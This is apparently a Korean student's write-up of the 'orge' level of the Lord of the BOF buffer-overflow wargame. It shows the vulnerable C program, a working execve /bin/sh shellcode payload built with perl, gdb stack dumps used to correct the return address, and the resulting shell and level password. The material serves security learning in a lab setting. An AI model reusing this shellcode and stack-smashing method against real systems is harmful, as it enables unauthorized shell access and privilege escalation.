darkelf->orge

[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// here is changed!

if(strlen(argv[0]) != 77){ //argv[0], 즉 (프로그램명)입력값이 77보다 작으면 에러가 납니다.

                printf("argv[0] error\n");

                exit(0);

}

// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

        // buffer hunter

        memset(buffer, 0, 40);

}

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'//우선은 프로그램명 길이를 77로 맟추고 공격시도

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0:0x99580b6a 0x2f2f6852      0x2f686873  0x896e6962

0xbffffbb0:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'` //제대로 된 리턴어드레스를 넣고 공격.

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

하하♥

시험공부하겠다며 소셜미디어를 끊고..

엘오비를 하고있네요!!!!!!!!! 이게뭐야!!!!!!!!

NOTES:

argv[0]=절대경로

./는 //가 몇개있어도 상관없다

.이랑 orgi=5

77-5=72

페이로드는 전단계것을 씀

그런데 쉘코드가 저장되는 곳은 어디일까? 버퍼가 아닌데